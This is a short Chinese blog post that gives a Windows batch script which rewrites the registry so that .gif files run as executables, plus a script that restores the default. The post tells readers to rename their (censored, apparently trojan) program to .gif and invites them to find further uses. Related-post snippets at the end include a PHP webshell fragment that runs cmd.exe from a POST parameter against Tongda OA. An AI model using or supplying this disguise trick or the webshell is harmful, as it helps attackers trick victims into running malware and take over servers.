任意檔案當做 來執行

2021-09-27 05:47:26 字數 779 閱讀 2540

任意檔案當做***來執行

更改exe為gif:

@echo off

color 1a

echo windows registry editor version 5.00>gif.reg

echo [hkey_local_machine\software\classes\.gif]>>gif.reg

echo @="exefile">>gif.reg

regedit /s gif.reg>nul 2>nul

del /s gif.reg>nul 2>nul

這個**儲存成.bat的檔案。

先執行這個bat檔案,系統會把.gif檔案來當做應用程式來執行

當然我們的***字尾要換成.gif 的。

恢復gif預設:

@echo off

color 1a

echo windows registry editor version 5.00>gif.reg

echo [hkey_local_machine\software\classes\.gif]>>gif.reg

echo "content type"="p_w_picpath/gif">>gif.reg

echo @="giffile">>gif.reg

regedit /s gif.reg>nul 2>nul

del /s gif.reg>nul 2>nul

這個**儲存成.bat的檔案。

大家可以發揮想象,有很多可以利用的地方。

通達OA未授權任意檔案上傳和任意檔案包含漏洞復現

建立乙個上傳的頁面 開啟後,上傳乙個jpg,內容如下 儲存為jpg phpwsh new com wscript.shell or die create wscript.shell failed exec phpwsh exec cmd.exe c post cmd stdout exec stdo...

Windows下PHP的任意檔案執行漏洞

受影響系統 php version 4.1.1 under windows php version 4.0.4 under windows 漏洞描述 在windows下的php,通過php.exe,攻擊者可以讓任何檔案作為乙個php檔案,即使這個檔案的副檔名不是php。比如,上傳乙個檔案,但是副檔名...

Windows下PHP的任意檔案執行漏洞

受影響系統 php version 4.1.1 under windows php version 4.lkfzd0.4 under windows 漏洞描述 在windows下的php,通過php.exe,攻擊者可以讓任何檔案作為乙個php檔案,即使這個檔案的副檔名不是php。比如,上傳乙個檔案,...